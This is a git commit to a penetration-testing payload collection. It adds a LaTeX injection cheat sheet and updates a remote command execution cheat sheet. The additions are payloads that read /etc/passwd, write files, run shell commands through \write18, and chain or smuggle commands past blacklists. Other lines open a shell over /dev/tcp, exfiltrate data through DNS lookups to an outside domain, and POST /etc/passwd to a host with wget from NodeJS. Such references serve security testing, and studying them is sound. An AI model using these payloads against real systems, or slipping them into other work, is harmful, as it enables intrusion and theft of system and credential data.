LaTeX injection + RCE bypass with backslash

This commit is contained in:
Swissky 2018-07-22 22:35:46 +02:00
parent 93f4bbb19e
commit 15891b3ab4
2 changed files with 75 additions and 13 deletions

57
LaTeX injection/README.md Normal file
View file

@ -0,0 +1,57 @@
# LaTex Injection
## Read file
```python
\input{/etc/passwd}
\include{password} # load .tex file
```
Read single lined file
```python
\newread\file
\openin\file=/etc/issue
\read\file to\line
\text{\line}
\closein\file
```
Read multiple lined file
```python
\newread\file
\openin\file=/etc/passwd
\loop\unless\ifeof\file
\read\file to\fileline
\text{\fileline}
\repeat
\closein\file
```
## Write file
```python
\newwrite\outfile
\openout\outfile=cmd.tex
\write\outfile{Hello-world}
\closeout\outfile
```
## Command execution
The input of the command will be redirected to stdin, use a temp file to get it.
```python
\immediate\write18{env > output}
\input{output}
```
If you get any LaTex error, consider using base64 to get the result without bad characters
```python
\immediate\write18{env | base64 > test.tex}
\input{text.tex}
```
```python
\input|ls|base4
```
## Thanks to
* [Hacking with LaTeX - Sebastian Neef - 0day.work](https://0day.work/hacking-with-latex/)
* [Latex to RCE, Private Bug Bounty Program - Yasho](https://medium.com/bugbountywriteup/latex-to-rce-private-bug-bounty-program-6a0b5b33d26a)
* [Pwning coworkers thanks to LaTeX](http://scumjr.github.io/2016/11/28/pwning-coworkers-thanks-to-latex/)

View file

@ -4,7 +4,7 @@ Remote Commands execution is a security vulnerability that allows an attacker to
## Exploits
Normal Commands execution, execute the command and voila :p
```
```powershell
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
@ -13,7 +13,7 @@ sys:x:3:3:sys:/dev:/bin/sh
```
Commands execution by chaining commands
```
```powershell
original_cmd_by_server; ls
original_cmd_by_server && ls
original_cmd_by_server | ls
@ -21,13 +21,13 @@ original_cmd_by_server || ls Only if the first cmd fail
```
Commands execution inside a command
```
```powershell
original_cmd_by_server `cat /etc/passwd`
original_cmd_by_server $(cat /etc/passwd)
```
Commands execution without space - Linux
```
```powershell
swissky@crashlab:~/Www$ cat</etc/passwd
root:x:0:0:root:/root:/bin/bash
@ -51,39 +51,44 @@ swissky@crashlab▸ ~ ▸ $ sh</dev/tcp/127.0.0.1/4242
```
Commands execution without space - Windows
```
```powershell
ping%CommonProgramFiles:~10,-18%IP
ping%PROGRAMFILES:~10,-5%IP
```
Commands execution without spaces, $ or { } - Linux (Bash only)
```
```powershell
IFS=,;`cat<<<uname,-a`
```
Commands execution with a line return
```
```powershell
something%0Acat%20/etc/passwd
```
Bypass blacklisted word with single quote
```
```powershell
w'h'o'am'i
```
Bypass blacklisted word with double quote
```
```powershell
w"h"o"am"i
```
Bypass blacklisted word with $@
Bypass blacklisted word with backslash
```powershell
w\ho\am\i
```
Bypass blacklisted word with $@
```powershell
who$@ami
```
Bypass zsh/bash/sh blacklist
```
```powershell
echo $0
-> /usr/bin/zsh
echo whoami|$0
@ -92,7 +97,7 @@ echo whoami|$0
## Time based data exfiltration
Extracting data : char by char
```
```powershell
swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real 0m5.007s
user 0m0.000s
@ -115,7 +120,7 @@ for i in $(ls /) ; do host "http://$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
## Environment based
NodeJS Commands execution
```
```powershell
require('child_process').exec('wget --post-data+"x=$(cat /etc/passwd)"+HOST')
```